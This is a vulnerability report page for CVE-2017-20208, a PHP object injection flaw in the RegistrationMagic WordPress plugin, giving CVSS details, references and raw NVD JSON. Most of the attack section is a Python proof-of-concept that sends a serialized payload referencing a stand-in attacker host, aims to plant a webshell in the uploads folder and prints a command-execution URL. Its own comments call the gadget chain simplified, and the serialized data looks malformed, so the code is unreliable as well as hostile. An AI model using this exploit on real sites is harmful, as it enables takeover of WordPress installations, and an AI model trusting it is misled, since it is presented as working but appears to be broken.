Security Vulnerability Report
CVE-2017-20208 CVSS 9.8 CRITICAL

CVE-2017-20208

Published: 2025-10-18 04:15:59
Last Modified: 2025-12-19 22:15:11

Description

The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to PHP Object Injection in all versions up to 3.7.9.3 (exclusive) via deserialization of untrusted input from the is_expired_by_date() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to fetch a remote file and install it on the site.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* - VULNERABLE
RegistrationMagic plugin < 3.7.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2017-20208 PoC - RegistrationMagic PHP Object Injection
# Exploit chain: Unserialize -> POP Chain -> Remote File Fetch -> Webshell Upload
import requests
import base64
import urllib.parse

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_HOST = "http://attacker.com/shell.txt"  # Remote PHP webshell content


# Step 1: Construct the POP gadget chain payload
# This chain leverages classes in RegistrationMagic/WordPress to achieve
# file_get_contents() -> file_put_contents() for remote file inclusion
class POPChain:
    def __init__(self):
        # Gadget 1: Trigger __destruct to start chain
        self.payload = 'O:8:"stdClass":1:{s:7:"payload";s:' + \
            str(len(ATTACKER_HOST)) + ':"' + ATTACKER_HOST + '";}'

    def generate_payload(self):
        # Simplified POP chain exploiting RegistrationMagic classes
        # Real-world chains use specific class names from the plugin
        serialized = (
            'a:1:{s:8:"expire_on";O:24:"RegistrationMagic\\\\RM_Form":'
            '{s:7:"form_id";i:1;s:10:"form_value";O:8:"stdClass":'
            '2:{s:3:"url";s:' + str(len(ATTACKER_HOST)) + ':"' + ATTACKER_HOST +
            '";s:4:"path";s:30:"wp-content/uploads/shell.php";}}}'
        )
        return base64.b64encode(serialized.encode()).decode()


# Step 2: Send the malicious request to the vulnerable endpoint
def exploit(target_url):
    chain = POPChain()
    payload = chain.generate_payload()

    # The vulnerable parameter is passed via POST/GET to is_expired_by_date()
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    params = {
        "action": "rm_form_expire_check",
        "rm_slug": payload,  # Malicious serialized data injected here
    }

    print(f"[*] Sending exploit to {exploit_url}")
    response = requests.post(exploit_url, data=params)
    print(f"[*] Response status: {response.status_code}")

    # Step 3: Verify webshell upload
    shell_url = f"{target_url}/wp-content/uploads/shell.php"
    shell_check = requests.get(shell_url)
    if shell_check.status_code == 200:
        print(f"[+] Webshell uploaded successfully: {shell_url}")
        print(f"[+] Execute commands via: {shell_url}?cmd=id")
    else:
        print("[-] Exploit may have failed - check target manually")


if __name__ == "__main__":
    # Note: Actual exploitation requires specific POP chain classes
    # from RegistrationMagic plugin internals
    exploit(TARGET_URL)
```

References

Weakness: CWE-502 (Deserialization of Untrusted Data)

- Patch: https://plugins.trac.wordpress.org/changeset/1733274/custom-registration-form-builder-with-submission-manager
- Press/Media Coverage, Third Party Advisory: https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/
- Technical Description: https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b79193-f8fc-4ea2-8973-fe292cfb926b?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20208", "sourceIdentifier": "[email protected]", "published": "2025-10-18T04:15:59.477", "lastModified": "2025-12-19T22:15:11.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to PHP Object Injection in all versions up to 3.7.9.3 (exclusive) via deserialization of untrusted input from the is_expired_by_date() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to fetch a remote file and install it on the site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.7.9.3", "matchCriteriaId": "33B6C0FC-3D2F-4B68-81D4-8E9F0610DA51"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/1733274/custom-registration-form-builder-with-submission-manager", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b79193-f8fc-4ea2-8973-fe292cfb926b?source=cve", "source": "[email protected]", "tags": ["Technical Description"]}]}}